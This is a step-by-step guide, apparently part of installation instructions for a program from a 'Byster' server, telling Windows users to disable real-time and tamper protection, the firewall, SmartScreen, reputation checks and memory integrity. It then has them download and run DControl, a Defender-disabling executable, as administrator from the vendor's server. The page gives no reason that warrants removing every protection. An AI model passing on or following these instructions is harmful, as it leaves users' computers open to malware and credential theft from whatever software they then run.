# 2. Windows Security

> ⚠️ These actions reduce your PC's protection. Perform them only immediately before using the program. Do not browse unrelated sites or open other files while protection is disabled. Restore instructions are provided on the last page.

### Virus & threat protection

#### Windows 10

`Settings → Update & Security → Windows Security → Virus & threat protection → Manage settings`

#### Windows 11

`Settings → Privacy & security → Windows Security → Open Windows Security → Virus & threat protection → Manage settings`

Turn off:

* Real-time protection;
* Cloud-delivered protection;
* Automatic sample submission;
* Tamper Protection.

### Firewall

Open `Windows Security → Firewall & network protection`.

1. Open the network marked **Active**.
2. Turn off **Microsoft Defender Firewall**.
3. Confirm the User Account Control prompt.

Do not disable the other network profiles unless required.

### Reputation-based protection

Open `Windows Security → App & browser control → Reputation-based protection settings`.

Turn off app and file checking, SmartScreen, and potentially unwanted app blocking.

### Core isolation

Open `Windows Security → Device security → Core isolation details`.

Turn off **Memory integrity**, then restart your PC.

### Exploit protection

Open `Windows Security → App & browser control → Exploit protection`.

Do not change individual system mitigations by guessing. If the program reports a conflict, send support a screenshot of this page and use only the exact values they provide.

### DControl

Use this step only after completing the settings above.

1. Download [DControl from the Byster server](https://r2.byster.one/uploads/2024/02/29/dcontrol.exe).
2. Right-click the file and choose **Run as administrator**.
3. Click **Disable**.
4. Confirm that its status shows protection as disabled.
